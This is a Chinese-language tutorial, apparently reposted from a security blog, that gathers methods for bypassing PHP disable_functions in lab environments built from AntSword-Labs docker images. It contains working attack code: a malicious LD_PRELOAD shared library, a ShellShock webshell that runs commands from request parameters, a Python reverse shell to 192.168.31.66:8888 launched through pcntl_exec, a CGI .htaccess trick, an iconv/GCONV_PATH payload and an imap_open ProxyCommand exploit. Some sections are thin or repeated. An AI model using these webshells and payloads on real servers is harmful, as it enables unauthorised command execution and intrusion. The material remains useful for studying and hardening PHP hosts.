突破PHP disable_functions方法

1. 利用 LD_PRELOAD 环境变量

知识扫盲

  • LD_PRELOAD:是Linux系统的一个环境变量,它指定的*.so文件会在程序本身的*.so文件之前被加载。
  • putenv():PHP函数,可以设置环境变量
  • mail(),error_log():PHP函数,在运行时会执行系统中的程序:sendmail

思路:构造一个带命令执行的eval.os文件,让其被LD_PRELOAD加载;然后在PHP中调用mail函数或error_log函数,函数内部会执行系统的sendmail命令,sendmail会调用其他的一些系统函数;这样我们构造的eval.os就会加载并覆盖sendmail本应调用的库函数,达到命令执行的效果。

  1. 首先写eval.c:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>__attribute__ ((__constructor__)) void hausa_zui_shuai(void)
{unsetenv("LD_PRELOAD");system("echo any_other_eval_code");system("/readflag > /tmp/hausa.txt");
}

__attribute__ ((__constructor__))这个参数,它使得被自己修饰的函数在main函数前执行。

  1. 然后gcc -shared -fPIC eval.c -o eval.so将这个源文件编译成动态链接库文件,并将其上传到服务器的/tmp目录下。

  1. 网站根目录上传shell.php
<?Php
putenv("LD_PRELOAD=/tmp/eval.so");
mail("", "", "", "");
error_log("",1,"","");
?>

然后url 访问shell.php。在访问过程中,putenv()函数将我们写好的恶意动态链接库文件赋值给LD_PRELOAD环境变量,然后在调用mail()和error_log的时候,Linux会执行系统程序sendmail,但是在执行sendmail的main函数之前,会先执行我们设计好的用了__attribute__ ((__constructor__))参数修饰的恶意函数,从而导致了命令的执行。

最后在/tmp目录下,即可看到hausa.txt文件

参考:Bypass disable_function —— LD_PRELOAD-CSDN博客

利用条件

  • Linux 操作系统
  • putenv
  • mail or error_log 本例中禁用了 mail 但未禁用 error_log
  • 存在可写的目录, 需要上传 .so 文件

参考:bypass_disable_functions/1

git clone https://github.com/AntSwordProject/AntSword-Labs.git
cd AntSword-Labs/bypass_disable_functions/1
docker-compose up -d

搜索disable_functions,查看禁用函数

上传webshell后执行命令无任何显示

利用方法

加载插件

选择模式

其他默认,然后直接点击开始

运行成功后会生成两个文件

直接使用蚁剑连接.antproxy.php那个文件,密码还是原来的密码。即可执行命令了

可发现在目标机器上用 PHP 启动了一个 http server, 并且加载的是 PHP 默认配置。

2. 利用 ShellShock (CVE-2014-6271)

CVE-2014-6271,通常被称为Shellshock漏洞。影响到了许多Unix和Linux操作系统。该漏洞的影响主要集中在Bash(Bourne Again Shell)这个常用的命令行解释器上。

Shellshock漏洞的根本原因是在Bash的环境变量处理中存在一个安全漏洞,允许攻击者在环境变量中注入恶意代码,然后在系统上执行任意命令。

利用条件

  • Linux 操作系统
  • putenv
  • mail or error_log 本例中禁用了 mail 但未禁用 error_log
  • /bin/bash 存在 CVE-2014-6271 漏洞
  • /bin/sh -> /bin/bash sh 默认的 shell 是 bash

利用方法

cd AntSword-Labs/bypass_disable_functions/2
docker-compose up -d

AntSword 默认虚拟终端中已经集成了对 ShellShock 的利用,直接在打开的虚拟终端中即可执行命令

手动利用

<?phpfunction runcmd($c){$d = dirname($_SERVER["SCRIPT_FILENAME"]);
if(substr($d, 0, 1) == "/" && function_exists('putenv') && (function_exists('error_log') || function_exists('mail'))){if(strstr(readlink("/bin/sh"), "bash")!=FALSE){$tmp=tempnam(sys_get_temp_dir(), 'as');putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");if (function_exists('error_log')) {error_log("a", 1);}else{mail("a@127.0.0.1", "", "", "-bv");}}else{print("Not vuln (not bash)\n");}$output = @file_get_contents($tmp);@unlink($tmp);if($output!=""){print($output);}else{print("No output, or not vuln.");}
}else{print("不满足使用条件");
}
}// runcmd("whoami"); // 要执行的命令
runcmd($_REQUEST["cmd"]); // ?cmd=whoami
?>

3. 利用pcntl_exec

pcntl是linux下的一个扩展,可以支持php的多线程操作。很多时候会碰到禁用exec等函数的情况,但如果运维人员安全意识不强或对PHP不甚了解,则很有可能忽略pcntl扩展的相关函数。

pcntl_exec()是pcntl插件专有的命令执行函数来执行系统命令函数,可以在当前进程空间执行指定的程序。

利用条件

  • PHP安装并启用了pcntl插件

可以通过phpinfo查看是否启用,如下如果出现 pcntl support enable则说明启用

或者如下访问test.php输出1则说明启用了pcntl_exec

<?php
if(function_exists('pcntl_exec')) {echo 1;
} else {echo 'pcntl extension is not support!';
}
?>

反弹shell

由于pcntl_exec()执行命令是没有回显的,所以其常与python结合来反弹shell。注意这里路径“/usr/bin/python3"可能不相同。访问test.php

<?php pcntl_exec("/usr/bin/python3",array('-c','import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM,socket.SOL_TCP);s.connect(("192.168.31.66",8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'));

反弹shell成功,可以正常执行命令

4. 利用 Apache Mod CGI

  1. CGI(Common Gateway Interface)是一种标准,允许 web 服务器调用外部程序来处理客户端的请求。通过 CGI,Web 服务器可以调用外部程序来处理特定的请求,这些程序负责生成动态的内容或执行其他服务器端任务关于CGI:
  2. mod_cgi: mod_cgi 是 Apache HTTP 服务器的一个模块,它实现了 CGI 标准,使得 Apache 能够处理和执行 CGI 脚本。这个模块允许 Apache 接收到 CGI 请求时,调用外部的 CGI 可执行文件或脚本,并将请求数据传递给这些程序。mod_cgi 会处理与 CGI 相关的环境变量和数据传递,以确保与外部程序的正确通信。

因此,mod_cgi 是 Apache 服务器上的一个模块,用于支持和处理 CGI 请求。当你在 Apache 中启用 CGI 支持时,mod_cgi 就会参与处理这些请求,将它们转发给外部程序(CGI 脚本或可执行文件)并将结果返回给客户端。

参考:https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/3

利用条件

  • Linux 操作系统,unix不可以如SunOS
  • Apache + PHP
  • Apache 开启了 cgi、rewrite
  • Web 目录给了 AllowOverride 权限。AllowOverride 是 Apache 配置中的一个指令,用于确定是否允许在.htaccess文件中覆盖服务器配置。这个指令可以在 Apache 配置文件(通常是httpd.conf)中设置,也可以在虚拟主机配置中设置。
  • 当前目录可写

我们利用 AntSword-Labs 项目来搭建环境:

git clone https://github.com/AntSwordProject/AntSword-Labs.git
cd AntSword-Labs/bypass_disable_functions/3
docker-compose up -d

启动后蚁剑连接,发现无法执行命令

查看apache否启用了 CGI 模块

  1. 通过phpinfo查看

  1. 查看 Apache 配置文件

通过查看apache的配置文件,通常为 /etc/httpd/httpd.conf、/etc/apache2/apache2.conf 或类似的文件。打开搜索如下

LoadModule cgi_module modules/mod_cgi.so

如果这一行存在,说明 mod_cgi 模块已经加载,即 CGI 支持已启用。

利用方法

使用「绕过 disable_functions」插件, 选择 Apache_mod_cgi 模式进行。注意:刚点进来的时候, 左侧状态栏处都是 NO

点击「开始」按钮后,成功之后, 会创建一个新的「虚拟终端」

手动利用

创建.htaccess 和shell.ant文件,需要在其Linux环境下创建因为编码问题。

首先在当前目录创建 .htaccess 文件,写入如下。该.htaccess文件的内容指示了在该目录下启用了 CGI 执行,并将文件扩展名为.ant的文件定义为 CGI 脚本。

Options +ExecCGI
AddHandler cgi-script .ant

然后新建 shell.ant 文件,写入要执行的命令。再加上执行权限

#!/bin/sh
echo Content-type: text/html
echo ""
echo&&id

最后访问shell.ant文件便可成功执行命令

5. 通过攻击 PHP-FPM

PHP-FPM(FastCGI Process Manager)是一个用于管理 FastCGI 进程的工具,专门为 PHP 脚本设计。FastCGI 是一种常见的通信协议,允许 Web 服务器(如 Nginx 或 Apache)与外部进程(如 PHP 解释器)之间进行更高效的通信。PHP-FPM 提供了一个进程管理器,负责处理 PHP 请求,提高性能和可扩展性。

具体来说,PHP-FPM 的主要功能包括:

  1. 进程管理: PHP-FPM 可以启动、停止和管理 PHP 进程。这使得它可以动态地调整处理 PHP 请求的进程数量,以适应服务器负载的变化。
  2. 性能提升: PHP-FPM 通过保持一组 PHP 进程在内存中并重用它们,减少了每个请求的启动时间。这有助于提高 PHP 脚本的执行速度和整体性能。
  3. 资源隔离: PHP-FPM 可以为每个 PHP 进程设置独立的资源限制,包括内存和执行时间。这有助于防止某个请求消耗过多资源影响整个服务器性能。
  4. 日志记录: PHP-FPM 生成日志,记录 PHP 进程的活动,包括错误信息和性能统计。这有助于管理员监控系统并进行故障排除。

总的来说,PHP-FPM 提供了一种有效管理 PHP 进程的方式,从而提高了 PHP 脚本在 Web 服务器上的性能和可靠性。

利用条件

  • Linux 操作系统
  • 开启了PHP-FPM服务(不会默认开启,需要安装、配置再开启)
  • 存在可写的目录, 需要上传 .so 文件

查找 PHP-FPM 接口地址

PHP-FPM(FastCGI Process Manager)通常监听一个本地套接字或网络端口,以便与 Web 服务器进行通信。接口地址(socket 地址或 IP 地址+端口)在 PHP-FPM 配置文件中指定。

  1. 查看 PHP-FPM 配置文件,如下发现端口为9000

利用方法

cd AntSword-Labs/bypass_disable_functions/5
docker-compose up -d

查看phpinfo,发现目标主机配置了FPM/Fastcgi

选择PHP-FPM的接口地址后,点击开始

成功后可以看到 /var/www/html/ 目录下新建了一个 .antproxy.php 文件。连接该文件后即可执行命令

6. 利用 Json Serializer UAF

UAF漏洞(Use-After-Free)是一种内存破坏漏洞,漏洞成因是一块堆内存被释放了之后又被使用。漏洞利用了 json 在序列化中的堆溢出触发 bypass

利用条件

  • Linux 操作系统
  • PHP 版本需满足:
    • 7.1 - all versions to date
    • 7.2 < 7.2.19 (released: 30 May 2019)
    • 7.3 < 7.3.6 (released: 30 May 2019)

UAF 一次可能不成功,需要多次尝试。

利用方法

cd AntSword-Labs/bypass_disable_functions/6
docker-compose up -d

查看php版本为7.2.18

选择 Json Serializer UAF 模式进行

7. 利用 GC UAF

漏洞利用的是 php garbage collector(垃圾收集器)程序中的堆溢出达成 bypass

利用条件

  • Linux 操作系统
  • PHP 版本
    • 7.0 - all versions to date
    • 7.1 - all versions to date
    • 7.2 - all versions to date
    • 7.3 - all versions to date

利用方法

cd AntSword-Labs/bypass_disable_functions/7
docker-compose up -d

查看php版本为7.2.18

选择 Json Serializer UAF 模式进行

8. 利用 FFI 扩展

PHP 7.4 的 FFI(Foreign Function Interface),即外部函数接口,允许用户在PHP代码中去调用C代码。

首先我们使用 FFI::cdef() 函数在PHP中声明一个我们要调用的这个C库中的函数以及使用到的数据类型,类似如下:

$ffi = FFI::cdef("int system(char* command);");   # 声明C语言中的system函数

这将返回一个新创建的FFI对象,然后使用以下方法即可调用这个对象中所声明的函数:

$ffi ->system("ls / > /tmp/res.txt");   # 执行ls /命令并将结果写入/tmp/res.txt

利用条件

  • Linux 操作系统
  • PHP >= 7.4
  • 开启了 FFI 扩展且 ffi.enable=On
cd AntSword-Labs/bypass_disable_functions/8
docker-compose up -d

php版本大于等于7.4

FFI扩展开启,所以可以尝试利用此方法

利用方法

选择 PHP74_FFI 模式进行

9. 利用iconv

利用条件

  • Linux 操作系统
  • putenv
  • iconv启用。PHP 中用于进行字符集转换的函数
  • 存在可写的目录, 需要上传 .so 文件
cd AntSword-Labs/bypass_disable_functions/9
docker-compose up -d

iconv函数 是 PHP 标准库的一部分,通常是默认启用的。也有可能被禁用

发现icon启用了

利用原理

PHP在执行iconv()函数时实际调用了glibc中一些和iconv相关的函数,其中一个叫iconv_open()的函数会根据GCONV_PATH环境变量找到系统的gconv-modules文件,再根据gconv-modules文件找到对应的.so文件进行链接。然后会调用.so文件中的gconv()和gonv_init()函数。如果我们能修改GCONV_PATH环境变量指向我们编写的gconv-modules文件,则可以使得PHP加载我们上传的恶意的动态链接库,然后绕过禁用函数执行命令。

需要在/tmp目录下上传一个gconv-modules文件,在其中写入如下内容:

module  自定义字符集名(大写)//    INTERNAL    ../../../../../../../../tmp/自定义字符集名(小写)    2
module  INTERNAL    自定义字符集名(大写)//    ../../../../../../../../tmp/自定义字符集名(小写)    2

在iconv.c中写入下面的C代码

#include <stdio.h>
#include <stdlib.h>void gconv() {}void gconv_init() {system("whoami > /tmp/result");
}

生成动态链接库payload.so:

gcc -shared -fPIC iconv.cpp -o 自定义字符集名.so

执行PHP代码:

<?phpputenv("GCONV_PATH=/tmp/");iconv("自定义字符集名", "UTF-8", "whatever");
?>

然后可以在/tmp/result下看到命令执行的结果

利用方法

使用iconv插件bypass

成功后连接/.antproxy.php即可执行命令

也不仅仅是iconv函数,还有其他的编码转换的方式也能触发iconv_open()函数,例如在蚁剑的插件源码里就有4种通过iconv绕过禁用函数的方式

if(function_exists('iconv')){iconv("payload","UTF-8","whatever");
}else if(function_exists('iconv_strlen')){iconv_strlen("1","payload");
}else if(function_exists('file_get_contents')){@file_get_contents("php://filter/convert.iconv.payload.UTF-8/resource=data://text/plain;base64,MQ==");
}else{@fopen('php://filter/convert.iconv.payload.UTF-8/resource=data://text/plain;base64,MQ==','r');
};

10. 利用ImageMagick 漏洞绕过(CVE-2016–3714)

imagemagick是一个用于处理图片的程序,它可以读取、转换、写入多种格式的图片。图片切割、颜色替换、各种效果的应用,图片的旋转、组合,文本,直线,多边形,椭圆,曲线,附加到图片伸展旋转。

利用ImageMagick绕过disable_functions的方法利用的是ImageMagick的一个漏洞(CVE-2016-3714)。漏洞的利用过程非常简单,只要将精心构造的图片上传至使用漏洞版本的ImageMagick,ImageMagick会自动对其格式进行转换,转换过程中就会执行攻击者插入在图片中的命令。因此很多具有头像上传、图片转换、图片编辑等具备图片上传功能的网站都可能会中招。所以如果在phpinfo中看到有这个ImageMagick,可以尝试一下。

利用条件

  • 目标主机安装并开启了ImageMagick拓展(版本需<= 3.3.0)
  • 安装了php-imagick拓展并在php.ini中启用;
  • PHP >= 5.4

利用方法

使用网上已有的docker镜像来搭建环境:

docker pull medicean/vulapps:i_imagemagick_1
docker run -d -p 8000:80 --name=i_imagemagick_1 medicean/vulapps:i_imagemagick_1

访问phpinfo.php,发现开启了imagemagick服务。并且版本为3.3.0

参考:bypass disable_functions姿势总结 - 先知社区、bypass disable_functions姿势总结 - 先知社区

11. 利用imap_open()绕过

利用条件需要安装iamp扩展,命令行输入:apt-get install php-imap

在php.ini中开启imap.enable_insecure_rsh选项为On;重启服务。

PHP 的imap_open函数中的漏洞可能允许经过身份验证的远程攻击者在目标系统上执行任意命令。该漏洞的存在是因为受影响的软件的imap_open函数在将邮箱名称传递给rsh或ssh命令之前不正确地过滤邮箱名称。如果启用了rsh和ssh功能并且rsh命令是ssh命令的符号链接,则攻击者可以通过向目标系统发送包含-oProxyCommand参数的恶意IMAP服务器名称来利用此漏洞。成功的攻击可能允许攻击者绕过其他禁用的exec 受影响软件中的功能,攻击者可利用这些功能在目标系统上执行任意shell命令。

exp:

<?php 
error_reporting(0); 
if (!function_exists('imap_open')) { 
die("no imap_open function!"); 
} 
$server = "x -oProxyCommand=echot" . base64_encode($_GET['cmd'] .
">/tmp/cmd_result") . "|base64t-d|sh}"; 
//$server = 'x -oProxyCommand=echo$IFS$()' . base64_encode($_GET['cmd'] .
">/tmp/cmd_result") . '|base64$IFS$()-d|sh}'; 
imap_open('{' . $server . ':143/imap}INBOX', '', ''); // or
var_dump("nnError: ".imap_last_error()); 
sleep(5); 
echo file_get_contents("/tmp/cmd_result"); 
?>

12. 利用 SplDoublyLinkedList UAC

PHP的SplDoublyLinkedList双向链表库中存在一个用后释放漏洞,该漏洞将允许攻击者通过运行PHP代码来转义disable_functions限制函数。在该漏洞的帮助下,远程攻击者将能够实现PHP沙箱逃逸,并执行任意代码。更准确地来说,成功利用该漏洞后,攻击者将能够绕过PHP的某些限制,例如disable_functions和safe_mode等等。

参考:奇安信攻防社区-常见 Bypass Disable Functions 的方法总结

参考:

  • https://www.cnblogs.com/one-seven/p/15194350.html
  • PHP禁用函数绕过 | e4stjun's blog
  • https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://xiahunao.cn/news/2661333.html

如若内容造成侵权/违法违规/事实不符,请联系瞎胡闹网进行投诉反馈,一经查实,立即删除!

相关文章

Python面向对象高级与Python的异常、模块以及包管理

Python面向对象高级与Python的异常、模块以及包管理 一、Python中的继承 1、什么是继承 我们接下来来聊聊Python代码中的“继承”:类是用来描述现实世界中同一组事务的共有特性的抽象模型,但是类也有上下级和范围之分,比如:生物 => 动物 => 哺乳动物 => 灵长型…

模式识别与机器学习-半监督学习

模式识别与机器学习-半监督学习 半监督学习半监督学习的三个假设半监督学习算法自学习算法自学习的步骤&#xff1a;自学习的优缺点&#xff1a;优点&#xff1a;缺点&#xff1a; 协同训练多视角学习生成模型半监督SVM 谨以此博客作为复习期间的记录 半监督学习 半监督学习&…

浅谈安科瑞智能照明系统在马来西亚国家石油公司项目的应用

摘要&#xff1a;随着社会经济的发展及网络技术、通信技术的提高&#xff0c;人们对照明设计提出了新的要求&#xff0c;它不仅要控制照明光源的发光时间、 亮度&#xff0c;而且与其它系统来配合不同的应用场合做出相应的灯光场景。本文介绍了马亚西亚石油公司智能照明项目的应…

大数据前馈神经网络解密:深入理解人工智能的基石

文章目录 大数据前馈神经网络解密&#xff1a;深入理解人工智能的基石一、前馈神经网络概述什么是前馈神经网络前馈神经网络的工作原理应用场景及优缺点 二、前馈神经网络的基本结构输入层、隐藏层和输出层激活函数的选择与作用网络权重和偏置 三、前馈神经网络的训练方法损失函…

蓝牙物联网智能安防系统设计方案

1概述 安防系统(安全防护)的作用是预防损失&#xff0c;是人们保障人身和财产安全最重要的工具之一。近年来&#xff0c;伴随经济的飞速发展和城市人口的急剧增加&#xff0c;盗窃、入室抢劫等事件的增多给人们的安定生活带来了很大的影响&#xff0c;同时&#xff0c;交通的快…

three.js绘制网波浪

无图不欢&#xff0c;先上图 使用方法&#xff08;以vue3为例&#xff09; <template><div class"net" ref"net"></div> </template><script setup> import { ref, onMounted } from vue import NetAnimation from /utils…

新能源汽车冷却系统的水道管口类型有哪些?格雷希尔针对这些管口密封的快速接头有哪些?

对于新能源汽车&#xff0c;不仅电池&#xff0c;还有电机、电控、充电单元部件&#xff0c;都需要处于适宜的工作温度&#xff0c;才能维持整车的正常运行。而这些部件在运行过程中会产生大量的热量&#xff0c;如果不及时散热会对汽车的性能、寿命产生影响&#xff0c;甚至可…

兔子目标检测数据集VOC格式3900张

兔子是一类可爱的哺乳动物&#xff0c;拥有圆润的脸庞和长长的耳朵&#xff0c;身体轻盈柔软。它们通常是以温和和友善的形象出现在人们的视野中&#xff0c;因此常常成为童话故事和卡通形象中的角色。 兔子是草食性动物&#xff0c;主要以各种草本植物为食&#xff0c;包括草…

深算院与新数科技达成战略合作,共筑国产数据库新生态

近日&#xff0c;深圳计算科学研究院&#xff08;以下简称“深算院”&#xff09;与北京新数科技有限公司&#xff08;以下简称“新数科技”&#xff09;达成战略合作。双方将融合发挥资源优势与技术优势&#xff0c;基于深算院自主研发设计的崖山数据库系统YashanDB&#xff0…

VD6283TX环境光传感器(2)----移植闪烁频率代码

VD6283TX环境光传感器----2.移植闪烁频率代码 闪烁定义视频教学样品申请源码下载参考代码硬件准备开发板设置生成STM32CUBEMX串口配置IIC配置X-CUBE-ALSADC使用定时器触发采样KEIL配置FFT代码配置app_x-cube-als.c需要添加函数演示结果 闪烁定义 光学闪烁是指人造光源产生的光…

conda环境下Could not build wheels for dlib解决方法

1 问题描述 在安装模型运行的conda环境时&#xff0c;出现如下问题&#xff1a; Building wheels for collected packages: basicsr, face-alignment, dlib, ffmpy, filterpy, futureBuilding wheel for basicsr (setup.py) ... doneCreated wheel for basicsr: filenamebasi…

【小程序】如何获取特定页面的小程序码

一、进入到小程序管理后台&#xff0c;进入后点击上方的“工具”》“生成小程序码” 小程序管理后台 二、进入开发者工具&#xff0c;打开对应的小程序项目&#xff0c;复制底部小程序特定页面的路径 三、粘贴到对应位置的文本框&#xff0c;点击确定即可

JMeter逻辑控制器之While控制器

JMeter逻辑控制器之While控制器 1. 背景2.目的3. 介绍4.While示例4.1 添加While控制器4.2 While控制器面板4.3 While控制器添加请求4.3 While控制器应用场景 1. 背景 存在一些使用场景&#xff0c;比如&#xff1a;某个请求必须等待上一个请求正确响应后才能开始执行。或者&…

C语言——指针题目“指针探测器“

如果你觉得你指针学的自我感觉良好&#xff0c;甚至已经到达了炉火纯青的地步&#xff0c;不妨来试试这道题目&#xff1f; #include<stdio.h> int main() {char* c[] { "ENTER","NEW","POINT","FIRST" };char** cp[] { c 3…

docker 安装可视化工具 Protainer 以及 汉化

一、创建保存数据的卷 安装网址&#xff1a;Install Portainer BE with Docker on Linux - Portainer Documentation docker pull portainer/portainer二、根据portainer镜像创建容器 docker run -d -p 8000:8000 -p 9000:9000\ --name portainer --restartalways \ -v /var/r…

缺失的第一个正数(LeetCode 41)

文章目录 1.问题描述2.难度等级3.热门指数4.解题思路4.1 暴力4.2 排序4.3 哈希表4.4 空间复杂度为 O(1) 的哈希表4.5 置换 参考文献 1.问题描述 给你一个未排序的整数数组 nums &#xff0c;请你找出其中没有出现的最小的正整数。 请你实现时间复杂度为 O(n) 并且只使用常数级…

网络MAC

网口框架 关键字 MAC&#xff1a; media access controller RMI: reduced media interface SMI&#xff1a;serial media interface N/A: Not applicable 全双工 & 半双工 3.1、在全双工模式下&#xff0c;8网根线都要分别接到水晶头相应的线序位置上&#xff1b; 3.2在…

数据之光:乡镇企业的发展利器——数据可视化

数据可视化是一项强大的工具&#xff0c;它不仅在大型企业中发挥关键作用&#xff0c;而且在乡镇企业中也能作出显著贡献。那么&#xff0c;数据可视化究竟能为乡镇企业做出什么样的贡献呢&#xff1f; 首先&#xff0c;数据可视化为乡镇企业提供了更清晰的业务洞察。通过将庞大…

Linux性能优化全景指南

Part1 Linux性能优化 1、性能优化性能指标 高并发和响应快对应着性能优化的两个核心指标&#xff1a;吞吐和延时 应用负载角度&#xff1a;直接影响了产品终端的用户体验系统资源角度&#xff1a;资源使用率、饱和度等 性能问题的本质就是系统资源已经到达瓶颈&#xff0c;但…

swing快速入门(三十一)文件选择器

注释很详细&#xff0c;直接上代码 上一篇 新增内容 1.菜单项按键响应 2. 文件选择器对话框用法 3.绘画板用法 package swing21_30;import javax.imageio.ImageIO; import javax.swing.*; import java.awt.*; import java.awt.event.ActionEvent; import java.awt.image.B…